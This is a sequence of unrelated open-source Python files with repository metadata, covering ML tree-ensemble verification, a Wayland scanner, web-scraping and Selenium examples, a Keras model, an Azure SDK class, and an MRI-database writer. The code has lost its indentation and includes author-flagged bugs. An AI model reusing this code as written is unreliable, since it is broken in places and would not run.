if (feature_idx == None): return True
# else
#
# old version works but doesn't parse well...
# return (feature_idx == _tree.TREE_UNDEFINED)
return (a_tree.children_left[node_idx] == a_tree.children_right[node_idx])
def get_node_value(self, tree_idx, node_idx):
return self.get_tree(tree_idx).value[node_idx][0][0]
def get_node_threshold(self, tree_idx, node_idx):
return self.get_tree(tree_idx).threshold[node_idx]
#
class XgbFormalRegressorModel(IDecisionTreeEnsembleFormalRegressorModel):
'''
xgboost implementation
'''
def __init__(self, solver_mng, metadata, xgb_regression_model, class_label,model_id):
IDecisionTreeEnsembleFormalRegressorModel.__init__(self, solver_mng, metadata, class_label)
self.model = xgb_regression_model;
self.trees = self._extract_trees_workaround(parse_trees(self.model))
# only now we know the amount of trees --> finishing the super constructor
IDecisionTreeEnsembleFormalRegressorModel._close_construction(self,model_id)
def _extract_trees_workaround(self, all_trees):
ret_trees = []
for tree_idx in range(len(all_trees)):
# FIXME: not sure it will work well for regressor
if ((tree_idx % self.get_num_classes()) == self.get_label()):
ret_trees.append(all_trees[tree_idx])
return ret_trees
def get_base_predictor(self):
return 0
def get_learning_rate(self):
# not really relevant... multiplying by 1
return 1 # self.model.learning_rate
def get_num_trees(self):
return len(self.trees)
def get_tree(self, tree_idx):
return self.trees[tree_idx]
#===========================================================================
# Note that the condition is different than sklearn...
#===========================================================================
def get_node_condition(self, tree_idx, node_idx, val):
if (isinstance(val , float) and (val == float("-inf"))): return True
if (isinstance(val , float) and (val == float("inf"))): return False
return (val < self.get_node_threshold(tree_idx, node_idx))
def get_true_child(self, tree_idx, node_idx):
return self.get_tree(tree_idx).true_children[node_idx]
def get_false_child(self, tree_idx, node_idx):
return self.get_tree(tree_idx).false_children[node_idx]
def is_leaf(self, tree_idx, node_idx):
feature_idx = self.get_tree(tree_idx).feature[node_idx]
return (feature_idx == None)
def get_node_value(self, tree_idx, node_idx):
# FIXME: bug! not the threshold!!
return self.get_tree(tree_idx).threshold[node_idx]
def get_node_threshold(self, tree_idx, node_idx):
return self.get_tree(tree_idx).threshold[node_idx]
#==============================================================================
# ensembles interfaces
#==============================================================================
def gb_classification(solver_mng, metadata, model, model_id=1,cmp_label=None, obs_vec=None, obs_label=None, epsilon=float('inf'), min_val=float('-inf'), max_val=float('inf')):
#print("building gb_classification...")
formal_model = []
for class_label in range(metadata.get_num_labels()):
if (isinstance(model, GradientBoostingClassifier)):
formal_model.append(SklFormalRegressorModel(solver_mng, metadata, model, class_label,model_id))
elif(isinstance(model, XGBClassifier)):
formal_model.append(XgbFormalRegressorModel(solver_mng, metadata, model, class_label,model_id))
else:
raise VeriGbError("unknown model type '" + str(type(model)) + "'")
if (cmp_label == None):
cmp_label = []
for i in range(metadata.get_num_labels()): cmp_label.append(i)
# cmp must have at least obs_label
if (obs_label != None): cmp_label.append(obs_label)
elif (epsilon != float('inf')):
raise VeriGbError("epsilon cannot be set if an observation is not given")
if (len(cmp_label) <= 1):
raise VeriGbError("Must have at least 2 labels to compare between")
print(formal_model)
class_alt = False
OUTPUT_VAR = solver_mng.get_output_var()
for l1 in cmp_label: class_alt = Or(class_alt, (OUTPUT_VAR == l1))
#
mc_model = And(True, class_alt)
for l1 in cmp_label:
mc_model = And(mc_model, formal_model[l1].get_ensemble_expr(obs_vec, epsilon, min_val, max_val, optimize_l1=False,i=1))
l1_gt_others = True
for l2 in cmp_label:
if (l1 == l2): continue
l1_gt_others = And(l1_gt_others, formal_model[l1].get_gt_constraints(formal_model[l2]))
mc_model = And(mc_model, ((OUTPUT_VAR == l1) == l1_gt_others))
# print("======================== mc_model:\n" + str(mc_model))
return mc_model
def gb_binary_classification(solver_mng, metadata, model, obs_vec, obs_label,model_id=1 ,
epsilon=float('inf'), min_val=float('-inf'), max_val=float('inf')):
#print("building gb_binary_classification...")
#obs label is the original
#cmp_lable label to compare to
formal_model = None
if (isinstance(model, GradientBoostingClassifier)):
formal_model = SklFormalRegressorModel(solver_mng, metadata, model, 0)
elif(isinstance(model, XGBClassifier)):
formal_model = XgbFormalRegressorModel(solver_mng, metadata, model, 0,model_id)
else:
raise VeriGbError("unknown model type '" + str(type(model)) + "'")
#mc_model = formal_model.get_ensemble_expr(obs_vec, epsilon, min_val, max_val, optimize_l1=False)
#OUTPUT_VAR = solver_mng.get_output_var()
#mc_model = And(mc_model, ((OUTPUT_VAR == 1) == formal_model.get_ge_zero()))
#mc_model = And(mc_model, ((OUTPUT_VAR == 0) == Not(formal_model.get_ge_zero())))
return formal_model
def rf_classification():
pass
def rf_unsupervised():
pass
#==============================================================================
# def iff_z3(a, b):
# return And(Implies(a, b), Implies(b, a))
|
[
"maayan.goldstein@nokia-bell-labs.com"
] |
maayan.goldstein@nokia-bell-labs.com
|
97469d166ee1c11a75b78a43d37270ea43a50214
|
172e4a0a42af7b6031e0755863765882844c12c9
|
/pywayland/scanner/event.py
|
d2aa79e4d849e1f326ed15c28920f284ee954f21
|
[
"Apache-2.0"
] |
permissive
|
green-green-avk/pywayland
|
7020da05d46596a62185ad69e59c0e22633d4681
|
65aae61d5df320dc0c39d46761e44a4e34137bb2
|
refs/heads/main
| 2023-02-27T22:50:10.883373
| 2020-12-27T21:40:45
| 2020-12-27T21:40:45
| 337,197,445
| 1
| 0
|
Apache-2.0
| 2021-02-08T20:14:20
| 2021-02-08T20:14:19
| null |
UTF-8
|
Python
| false
| false
| 2,231
|
py
|
# Copyright 2015 Sean Vig
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
from typing import Iterator
import xml.etree.ElementTree as ET
from .argument import Argument
from .description import Description
from .method import Method
from .printer import Printer
@dataclass(frozen=True)
class Event(Method):
"""Scanner for event objects (server-side method)
Required attributes: `name`
Optional attributes: `since`
Child elements: `description` and `arg``
"""
method_type = "event"
@classmethod
def parse(cls, element: ET.Element) -> "Event":
name = cls.parse_attribute(element, "name")
if name in ("global", "import"):
name += "_"
return cls(
name=name,
since=cls.parse_optional_attribute(element, "since"),
description=cls.parse_optional_child(element, Description, "description"),
arg=cls.parse_repeated_child(element, Argument, "arg"),
)
@property
def method_args(self) -> Iterator[str]:
"""Generator of the arguments to the method
All arguments to be sent to `._post_event` must be passed in
"""
for arg in self.arg:
yield arg.name
def output_doc_params(self, printer: Printer) -> None:
"""Aguments documented as parameters
All arguments are event parameters.
"""
for arg in self.arg:
arg.output_doc_param(printer)
def output_body(self, printer: Printer, opcode: int) -> None:
"""Output the body of the event to the printer"""
args = ", ".join([str(opcode)] + list(self.method_args))
printer("self._post_event({})".format(args))
|
[
"sean.v.775@gmail.com"
] |
sean.v.775@gmail.com
|
634619ac997537061052ec76d0a879e9283ea4bd
|
3d919114df49b96e31fa7fed767707a01f5f1a0f
|
/08 Navigating with Beautiful Soup - Going Up/028 parents.py
|
3d2b4c4ffda2434b3c2e85c1e51752b2d006a676
|
[] |
no_license
|
ranganadh234/webscraping
|
2233590e6a6b6664eb70ae1730580659bcb56955
|
7fa11e465e6f74dbdb2918cb81b871916fe6c053
|
refs/heads/master
| 2020-12-15T08:05:59.120975
| 2020-01-20T06:48:56
| 2020-01-20T06:48:56
| 235,036,259
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
from bs4 import BeautifulSoup
def read_file():
file = open('three_sisters.html')
data = file.read()
file.close()
return data
soup = BeautifulSoup(read_file(),'lxml')
# .parents --- returns a list ( generator ) of parents
link = soup.a
for parent in link.parents:
print(parent.name)
|
[
"ranganadh234@gmail.com"
] |
ranganadh234@gmail.com
|
fa5d3b27d655bc9a4a771ba01e6247b8cf74815b
|
e85ee961a71abfe3892d266b34529ad4600e6b42
|
/features/steps/User can select color.py
|
78c6d3f5e9363cd3dcf7443bc8f9b33c0e1e39a1
|
[] |
no_license
|
kazijesin/gettop-automation
|
80efdabe971426dd0fced088951c09f19ce157eb
|
be30249f11e810495ef6e247afd5a4ad7f468d3d
|
refs/heads/main
| 2023-07-05T01:59:59.573213
| 2021-08-15T18:37:46
| 2021-08-15T18:37:46
| 392,508,619
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 981
|
py
|
from selenium.webdriver.common.by import By
from behave import given, when, then
from selenium import webdriver
@given('Open Amazon product B07F2N8KWH page')
def open_amazon_product_page(context):
product_id = context.driver.get('https://www.amazon.com/dp/B07F2N8KWH?th=1')
@then('verify user can click through colors')
def verify_user_click_color(context):
expected_colors = ['Black', 'Blue', 'Gray', 'Grey Pineapple', 'Grey Plaid', 'Khaki', 'Khaki Anchor', 'Khaki Plaid', 'Navy', 'Navy Anchor', 'Navy Plaid', 'Olive', 'Olive Plaid', 'Silver', 'Stone', 'Washed Red','Washed Red Lobster']
color_webelements = context.driver.find_elements(By.CSS_SELECTOR,"#variation_color_name li")
for i in range(len(color_webelements)):
color_webelements[i].click()
actual_text = context.driver.find_element(By.CSS_SELECTOR, "#variation_color_name span.selection").text
assert actual_text == expected_colors[i], f'Error, color is {actual_text}, but expected {expected_colors[i]}'
|
[
"kazijesin@gmail.com"
] |
kazijesin@gmail.com
|
64ee16abcbe29058926e42f640c79595f3284361
|
6014755d8a4261336c06210ab9b8f9c783e10d28
|
/src/model/attention_model.py
|
e6eea616d4d5ca4037e6f5bedd0415dcf95a9b59
|
[] |
no_license
|
yupeihua/SOHU_competition
|
33775357ff15c8c924400d33f99158d94a0d5737
|
168fb3f0f382ab95a4116d639c2c1de886acdfc2
|
refs/heads/master
| 2020-03-22T19:09:49.095217
| 2018-07-11T01:53:10
| 2018-07-11T01:53:10
| 140,510,033
| 8
| 0
| null | 2018-07-11T02:18:26
| 2018-07-11T02:18:25
| null |
UTF-8
|
Python
| false
| false
| 2,518
|
py
|
# -*- coding: utf-8 -*-
"""
# @Time : 2018/7/6 上午11:50
# @Author : zhanzecheng
# @File : attention_model.py
# @Software: PyCharm
"""
from keras.layers import *
from keras.models import *
from model.model_component import AttentionWeightedAverage
from model.model_basic import BasicModel
from keras.utils.vis_utils import plot_model
class AttentionModel(BasicModel):
def __init__(self, maxLen, ocrLen, max_features, init_embedding_matrix, name='basicModel', num_flods=4, batch_size=64):
BasicModel.__init__(self, maxLen, ocrLen, max_features, init_embedding_matrix, name='Attention', num_flods=num_flods, batch_size=batch_size)
def create_model(self):
recurrent_units = 60
main_input = Input(shape=(self.maxLen,), name='news')
embedding = Embedding(self.max_features, self.embed_size, weights=[self.embedding_matrix], trainable=False, name='embedding')
embedding_layer = embedding(main_input)
embedding_layer = SpatialDropout1D(0.25)(embedding_layer)
rnn_1 = Bidirectional(GRU(recurrent_units, return_sequences=True, dropout=0.1, recurrent_dropout=0.1))(
embedding_layer)
x = Bidirectional(GRU(recurrent_units, return_sequences=True, dropout=0.1, recurrent_dropout=0.1))(rnn_1)
# x = concatenate([rnn_1, rnn_2], axis=2)
last = Lambda(lambda t: t[:, -1], name='last')(x)
maxpool = GlobalMaxPooling1D()(x)
attn = AttentionWeightedAverage()(x)
average = GlobalAveragePooling1D()(x)
ocr_input = Input(shape=(self.ocrLen,), name='ocr')
ocr_embedding_layer = embedding(ocr_input)
ocr_embedding_layer = SpatialDropout1D(0.25)(ocr_embedding_layer)
ocr_rnn_1 = Bidirectional(GRU(recurrent_units // 2, return_sequences=True, dropout=0.1, recurrent_dropout=0.1))(
ocr_embedding_layer)
ocr_rnn_2 = Bidirectional(GRU(recurrent_units // 2, return_sequences=True, dropout=0.1, recurrent_dropout=0.1))(ocr_rnn_1)
ocr_maxpool = GlobalMaxPooling1D()(ocr_rnn_2)
ocr_attn = AttentionWeightedAverage()(ocr_rnn_2)
all_views = concatenate([last, maxpool, attn, average, ocr_maxpool, ocr_attn], axis=1)
x = Dropout(0.5)(all_views)
dense2 = Dense(3, activation="softmax")(x)
res_model = Model(inputs=[main_input, ocr_input], outputs=dense2)
plot_model(model, to_file="model.png", show_shapes=True)
# res_model = Model(inputs=[main_input], outputs=main_output)
return res_model
|
[
"50673223@qq.com"
] |
50673223@qq.com
|
2b6a129f0d9522336f6edb213499ad4c61064e74
|
a5ba631dddaf2912c309601f8fbdd3c5b494fe20
|
/src/command_modules/azure-cli-lab/azure/cli/command_modules/lab/sdk/devtestlabs/models/subscription_notification_properties.py
|
b9fc92eb180e232ec8a8f95a491cf06d9dbd3a0d
|
[
"MIT"
] |
permissive
|
saurabsa/azure-cli-old
|
37471020cd2af9a53e949e739643299f71037565
|
f77477a98c9aa9cb55daf5b0d2f410d1455a9225
|
refs/heads/master
| 2023-01-09T04:00:15.642883
| 2018-04-23T21:40:04
| 2018-04-23T21:40:04
| 130,759,501
| 0
| 0
|
NOASSERTION
| 2022-12-27T14:59:06
| 2018-04-23T21:33:34
|
Python
|
UTF-8
|
Python
| false
| false
| 748
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# coding: utf-8
# pylint: skip-file
from msrest.serialization import Model
class SubscriptionNotificationProperties(Model):
"""SubscriptionNotificationProperties.
:param tenant_id:
:type tenant_id: str
"""
_attribute_map = {
'tenant_id': {'key': 'tenantId', 'type': 'str'},
}
def __init__(self, tenant_id=None):
self.tenant_id = tenant_id
|
[
"saurabsa@microsoft.com"
] |
saurabsa@microsoft.com
|
a9c5c9383436579ca30acdc3b1563e3b8454991c
|
5256661b302738acede0e6d79f6d2cb4c7de9b99
|
/alien.py
|
a80b6805204f2207baeb384a69015683abeaed54
|
[] |
no_license
|
ArtemiiLulevich/Python_My_game
|
0f80f91fa4d814b8080e596f176f48060987433d
|
fb337b6427b44f9a485d04a4a1a2d9badf33cdd4
|
refs/heads/master
| 2022-07-10T17:49:03.160551
| 2019-11-02T16:10:43
| 2019-11-02T16:10:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 893
|
py
|
import pygame
from pygame.sprite import Sprite
class Alien(Sprite):
"""Class that present one alian"""
def __init__(self, ai_setting, screen):
super(Alien, self).__init__()
self.screen = screen
self.ai_setting = ai_setting
self.image = pygame.image.load('img/Alien_ref.png')
self.rect = self.image.get_rect()
self.rect.x = self.rect.width
self.rect.y = self.rect.height
self.x = float(self.rect.x)
def blitalien(self):
self.screen.blit(self.image, self.rect)
def update(self):
self.x += (self.ai_setting.alien_speed_factor * self.ai_setting.fleet_direction)
self.rect.x = self.x
def check_edge(self):
screen_rect = self.screen.get_rect()
if self.rect.right >= screen_rect.right:
return True
elif self.rect.left <= 0:
return True
|
[
"artemii.lulevich@gmail.com"
] |
artemii.lulevich@gmail.com
|
5a6f4091193bccde341bc3a84853bb66ed6af836
|
4ec6ed4ebcb9346042669e6aa03be0e502ed48b3
|
/leetcode/degree-of-an-array.py
|
d2e83b90bea0069a9fd08652021f2629686a76c3
|
[] |
no_license
|
shonihei/road-to-mastery
|
79ed41cb1ad0dc2d0b454db2ccc7dd9567b03801
|
312bdf5101c3c1fc9a4d0b6762b5749ca57efe08
|
refs/heads/master
| 2021-01-22T19:59:17.038641
| 2017-11-16T15:21:55
| 2017-11-16T15:21:55
| 85,266,186
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,055
|
py
|
"""
Given a non-empty array of non-negative integers nums, the degree of this array is defined as the maximum frequency of any one of its elements.
Your task is to find the smallest possible length of a (contiguous) subarray of nums, that has the same degree as nums.
Example 1:
Input: [1, 2, 2, 3, 1]
Output: 2
Explanation:
The input array has a degree of 2 because both elements 1 and 2 appear twice.
Of the subarrays that have the same degree:
[1, 2, 2, 3, 1], [1, 2, 2, 3], [2, 2, 3, 1], [1, 2, 2], [2, 2, 3], [2, 2]
The shortest length is 2. So return 2.
Example 2:
Input: [1,2,2,3,1,4,2]
Output: 6
"""
def findShortestSubArray(nums):
"""
:type nums: List[int]
:rtype: int
"""
d = {}
for i in range(len(nums)):
try:
d[nums[i]][0] += 1
d[nums[i]][2] = i
except KeyError:
d[nums[i]] = [1, i, i]
min_len = float('inf')
max_freq = 0
for k, v in d.items():
if v[0] > max_freq:
min_len = v[2] - v[1] + 1
max_freq = v[0]
if v[0] == max_freq:
if v[2] - v[1] + 1 < min_len:
min_len = v[2] - v[1] + 1
return min_len
|
[
"shonihei@gmail.com"
] |
shonihei@gmail.com
|
1e0994f4e3d42c65bfbfc8138c22de4a829413f7
|
d6aba9e818c6f6d021d8407cba97f21473b53f17
|
/sdnve_plugin/sdnve-plugin-icehouse/plugin-archive/int_support/neutron-sdnve-agent
|
b1b3a995b3a9f3b6c019cec5fd9a86d5b9c62ba7
|
[] |
no_license
|
yeasy/sc_demo
|
14a064813b3bb8673b25d90c7effeec00f9574cc
|
44493a6a3a3f74c4bef1b3a18dc5b0bba6f827fb
|
refs/heads/master
| 2020-04-22T06:12:02.262764
| 2014-10-29T05:36:19
| 2014-10-29T05:36:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 814
|
#!/usr/bin/env python
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Red Hat
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import sys
sys.path.insert(0, os.getcwd())
from neutron.plugins.ibm.agent.sdnve_neutron_agent import main
main()
|
[
"yangbaohua@gmail.com"
] |
yangbaohua@gmail.com
|
|
84ef810c5c406c0e804b8c3f86ef8d9b90a780d6
|
38a80a057aab8ebd0f26ea347a87fa3afb2432eb
|
/dedict.py
|
434924084c650b55127ab0ad19a8f62429ca661d
|
[] |
no_license
|
aped/dict_tools
|
3d0c6544c2fafc961905eae4088766996ee6f106
|
bb038055ca386f7fe31f3b27a5cafb2c94c2d279
|
refs/heads/master
| 2020-03-30T20:41:52.884110
| 2013-03-12T00:21:27
| 2013-03-12T00:21:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 298
|
py
|
#!/usr/bin/env python2.7
""" Takes a nested dict structure and turns it into a list of dicts,
merging the old highest-level keys into the lower dicts.
"""
def dedict(adict, new_key):
lst = []
for k,v in adict.items():
v[new_key] = k
lst.append(v)
return lst
|
[
"andrew.r.pedelty@gmail.com"
] |
andrew.r.pedelty@gmail.com
|
12870699608e9ba17b7effdeee942a10a6e3a251
|
6b0c4f71685bf538e00ad97582d5333096af242c
|
/lacquer/tree/grouping.py
|
999a8765cf396633938555790ba34c603fad8865
|
[] |
no_license
|
lsst-dm/lacquer
|
b487152094d222263fdfdfaf2f8b4095d3a85897
|
c2e8b9ab0cdcc4e018782cb81f21733a6da3f2d4
|
refs/heads/main
| 2023-07-21T11:36:23.412905
| 2023-07-10T00:50:05
| 2023-07-10T00:50:05
| 55,021,566
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 960
|
py
|
from .node import Node
class GroupingElement(Node):
def __init__(self, line=None, pos=None):
super(GroupingElement, self).__init__(line, pos)
# def enumerate_grouping_sets(self):
# pass
class GroupingSets(GroupingElement):
def __init__(self, line=None, pos=None, sets=None):
super(GroupingSets, self).__init__(line, pos)
self.sets = sets
# def enumerate_grouping_sets(self):
# pass
# def __str__(self):
# """
# return MoreObjects.toStringHelper(this).add("sets", sets).toString();
# """
class SimpleGroupBy(GroupingElement):
def __init__(self, line=None, pos=None, columns=None):
super(SimpleGroupBy, self).__init__(line, pos)
self.columns = columns
# def enumerate_grouping_sets(self):
# pass
# def __str__(self):
# """
# return MoreObjects.toStringHelper(this).add("columns", columns).toString();
# """
|
[
"bvan@slac.stanford.edu"
] |
bvan@slac.stanford.edu
|
132b194edad5e920576624ca8e253ca557d62443
|
47b621365f3c300e02ca584c546ffa221e2ad448
|
/scrapping/__init__.py
|
a75abf687a1d9603c8e19ce78ceabadd65e329ee
|
[
"MIT"
] |
permissive
|
aipyth/scrapping
|
42d0e8eae97f5789609358a778c9f0d3f1b45f99
|
a7746c1b15a3ff3cffc4fc011d1a4280a03e3ced
|
refs/heads/master
| 2020-06-26T03:23:55.519636
| 2019-07-29T19:09:12
| 2019-07-29T19:09:12
| 199,511,809
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 112
|
py
|
from .requests import Request, Method
from . import data_handler as DataHandlers
from . import spider as Spider
|
[
"ipython10@gmail.com"
] |
ipython10@gmail.com
|
c3c5970408d92c53453e9594b8d80ca37c0bc232
|
5157b08ea91d2f313fcabf8497a2cf7722b1f771
|
/learn/test.py
|
9a25a7a3c9e583bd11b6ae40c5e5029c44b2c212
|
[] |
no_license
|
ay27/MatrixFactorization
|
c829347f59d9a995a1c299753c3d5a06031e2cf1
|
53e0c6aacedd5285804a7c2fb79ece8642393e2d
|
refs/heads/master
| 2021-05-04T11:00:33.098096
| 2017-02-01T10:16:12
| 2017-02-01T10:16:12
| 53,820,648
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 101
|
py
|
# Created by ay27 at 16/3/25
def ff(x):
return {'aa':x, 'a': x*x}
obj = ff(2)
print(obj.a)
|
[
"me@ay27.pw"
] |
me@ay27.pw
|
b373450530b1e02b06734dca333f4f44b9a97f91
|
7e8bf70d752466b326307b71f9c2d211cfbab611
|
/SQL.py
|
34c5bdbf7db7f488da1a18cfdd1dcfd006089b68
|
[] |
no_license
|
cgallego/Get_Anonymized_Accession_annot2db
|
e814024ee220909ae56f65116900442a3aa01816
|
805d0c07f9363e3ac4d57b9bf7d1820ed25ee13a
|
refs/heads/master
| 2021-01-02T09:25:52.442744
| 2015-06-29T19:01:42
| 2015-06-29T19:01:42
| 32,989,228
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,239
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 13 10:36:51 2013
@author: Karen Klassen
"""
from dictionaries import biomatrix_user, biomatrix_password, biomatrix_host,\
biomatrix_database, program_loc
import instances
import os
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.dialects.postgresql import ARRAY
Base=declarative_base()
class Table(Base):
"""
Represents the tbl_pt_mri_series table. This is the one that is filled by
the later code.
"""
__tablename__='tbl_pt_mri_series'
pt_mri_series_id=sqlalchemy.Column(sqlalchemy.Integer,\
primary_key=True)
exam_img_dicom_txt=sqlalchemy.Column(sqlalchemy.Text)
series_uid_txt=sqlalchemy.Column(sqlalchemy.Text)
series_desc_txt=sqlalchemy.Column(sqlalchemy.Text)
translation_txt=sqlalchemy.Column(sqlalchemy.Text)
type_int=sqlalchemy.Column(sqlalchemy.Integer)
processed_yn=sqlalchemy.Column(sqlalchemy.Integer)
protocol_txt=sqlalchemy.Column(sqlalchemy.Text)
te_double=sqlalchemy.Column(sqlalchemy.Float)
tr_double=sqlalchemy.Column(sqlalchemy.Float)
pt_position_int=sqlalchemy.Column(sqlalchemy.Integer)
side_txt=sqlalchemy.Column(sqlalchemy.Text)
subtracted_yn=sqlalchemy.Column(sqlalchemy.Integer)
registered_yn=sqlalchemy.Column(sqlalchemy.Integer)
fat_saturated_yn=sqlalchemy.Column(sqlalchemy.Integer)
three_d_yn=sqlalchemy.Column(sqlalchemy.Integer)
contrast_yn=sqlalchemy.Column(sqlalchemy.Integer)
img_int_array=sqlalchemy.Column(ARRAY(sqlalchemy.Integer))
voxel_spc_double_arry=sqlalchemy.Column(ARRAY(sqlalchemy.Numeric))
start_time=sqlalchemy.Column(sqlalchemy.Time)
length_of_time_arry=sqlalchemy.Column(ARRAY(sqlalchemy.Integer))
img_orientation_int=sqlalchemy.Column(sqlalchemy.Integer)
orientation_txt=sqlalchemy.Column(sqlalchemy.Text)
a_no_txt=sqlalchemy.Column(sqlalchemy.Text)
study_description_txt=sqlalchemy.Column(sqlalchemy.Text)
updated_on=sqlalchemy.Column(sqlalchemy.DateTime,\
default=sqlalchemy.func.now()) #func.now causes auto-update
def __init__(self,obj):
"""
Creates a Table object (a row) having the same values as a Series
object. Takes in a single Series object.
"""
self.exam_img_dicom_txt=obj.DICOMnum
self.series_uid_txt=obj.UID
self.series_desc_txt=obj.series
self.study_description_txt=obj.study
self.translation_txt=obj.translation
self.type_int=obj.type
self.processed_yn=obj.processed
self.protocol_txt=obj.protocol_name
self.te_double=obj.te
self.tr_double=obj.tr
self.pt_position_int=obj.position
self.side_txt=obj.side
self.subtracted_yn=obj.sub
self.registered_yn=obj.reg
self.fat_saturated_yn=obj.fat
self.three_d_yn=obj.dimension
self.contrast_yn=obj.contrast
self.img_int_array=obj.isize
self.voxel_spc_double_arry=obj.vdim
self.start_time=obj.intime
self.length_of_time_arry=obj.timediffer
self.img_orientation_int=obj.orient
self.orientation_txt=obj.ormatrix
self.a_no_txt=obj.accnum
#not apart of pipeline
class Exam(Base):
"""
Represents the tbl_pt_exam table
"""
__tablename__='tbl_pt_exam'
pt_exam_id=sqlalchemy.Column(sqlalchemy.Integer,primary_key=True)
exam_img_dicom_txt=sqlalchemy.Column(sqlalchemy.Integer)
def run_code(examID, exam_loc):
"""
Sets up connection with Biomatrix, creates rows and writes them to the
table (commits them).
Takes in examID and exam_loc as strings.
"""
engine='postgresql+psycopg2://'+biomatrix_user+':'+biomatrix_password+'@'\
+biomatrix_host+'/'+biomatrix_database
engine1=sqlalchemy.create_engine(engine)
Base.metadata.create_all(engine1)
Session=sessionmaker(bind=engine1)
session=Session()
objs=instances.objects(examID,exam_loc)
#this section is for if the table was linked to tbl_pt_exam table
"""
#finds primary_key for matching DICOM number to link the two tables
q=session.query(Exam).all()
for x in q:
if x.exam_img_dicom_txt==objs[0].DICOMnum:
key=x.pt_exam_id
break
"""
#checks for duplicates and creates rows
rows=[]
for i in objs:
duplicates(engine1,i)
rows.append(Table(i))
print 'Writing to database...'
session.add_all(rows)
session.commit()
os.chdir(program_loc)
new=open('Usedlist.txt','a') #records examIDs already done
new.write('['+str(examID)+'] \n')
new.close()
#disconnects from database
session.close()
engine1.dispose()
return
def duplicates(engine,single):
"""
Assumes Series UID is unique.
Checks tbl_pt_mri_series to make sure that no duplicates get created.
Takes engine as a SQLAlchemy object and single as a Series object.
Errors out if it finds a duplicate.
"""
Session=sessionmaker(bind=engine)
session=Session()
rows=session.query(Table).all()
for r in rows:
if r.series_uid_txt==single.UID:
raise RuntimeError('Series is already in table by UID')
if r.a_no_txt==single.accnum:
raise RuntimeError('Series is already in table by Accession')
return
def testing():
"""
Used to see which accession numbers are on the database. Also gives the
total number of studies on the database.
"""
engine='postgresql+psycopg2://'+biomatrix_user+':'+biomatrix_password+'@'\
+biomatrix_host+'/'+biomatrix_database
engine1=sqlalchemy.create_engine(engine)
Base.metadata.create_all(engine1)
Session=sessionmaker(bind=engine1)
session=Session()
q=session.query(Table).all()
results=[]
for x in q:
results.append(x.a_no_txt)
thing=set(results)
thing2=list(thing)
thing2.sort()
for i in thing2:
print i
print 'Total entered: '+str(len(thing2))
return
def testing2():
"""
Prints all entries for a given DICOM number.
"""
engine='postgresql+psycopg2://'+biomatrix_user+':'+biomatrix_password+'@'\
+biomatrix_host+'/'+biomatrix_database
engine1=sqlalchemy.create_engine(engine)
Base.metadata.create_all(engine1)
Session=sessionmaker(bind=engine1)
session=Session()
q=session.query(Table).all()
for x in q:
if x.exam_img_dicom_txt=='16385':
#print x.pt_mri_series_id
print x.exam_img_dicom_txt
print x.series_uid_txt
print x.series_desc_txt
print x.translation_txt
#print x.type_int
#print x.processed_yn
#print x.protocol_txt
#print x.te_double
#print x.tr_double
#print x.pt_position_int
#print x.side_txt
#print x.subtracted_yn
#print x.registered_yn
print x.fat_saturated_yn
#print x.three_d_yn
#print x.contrast_yn
#print x.img_int_array
#print x.voxel_spc_double_arry
#print x.start_time
#print x.length_of_time_arry
#print x.img_orientation_int
#print x.orientation_txt
#print x.updated_on
return
def testing3():
"""
Tests something else
"""
engine='postgresql+psycopg2://'+biomatrix_user+':'+biomatrix_password+'@'\
+biomatrix_host+'/'+biomatrix_database
engine1=sqlalchemy.create_engine(engine)
Base.metadata.create_all(engine1)
Session=sessionmaker(bind=engine1)
session=Session()
q=session.query(Table).all()
for x in q:
if x.start_time:
print x.start_time, x.length_of_time_arry
return
|
[
"admin@webdsdesign.com"
] |
admin@webdsdesign.com
|
7168d30b25a5b7bfe321011b2883072fa9d97db1
|
51a5661570dfb361984733b53441a62a62bff5e0
|
/scratch/ngc4590-ps1e/target-selection.py
|
9aebb6ee8343edbad72a2c3e5cf64c0674157644
|
[
"MIT"
] |
permissive
|
ahriley/gjoll-ngc3201
|
e4db7b4df6d9f3148e891f353c0756a99b64c52a
|
5d38e00b69c939d3425fa66696ffc5be5833c5c6
|
refs/heads/main
| 2022-11-23T13:32:25.241627
| 2020-07-23T22:19:48
| 2020-07-23T22:19:48
| 281,833,420
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,095
|
py
|
import numpy as np
import astropy.units as u
import astropy.coordinates as coord
import matplotlib.pyplot as plt
import pandas as pd
from scipy.interpolate import interp1d
import utils
# Galactocentric frame post-Gaia (defaults from astropy v4.0)
coord.galactocentric_frame_defaults.set('v4.0')
# parameters for orbit integration
timestep = -1 * u.Myr
totaltime = 500*u.Myr
# cluster coordinates
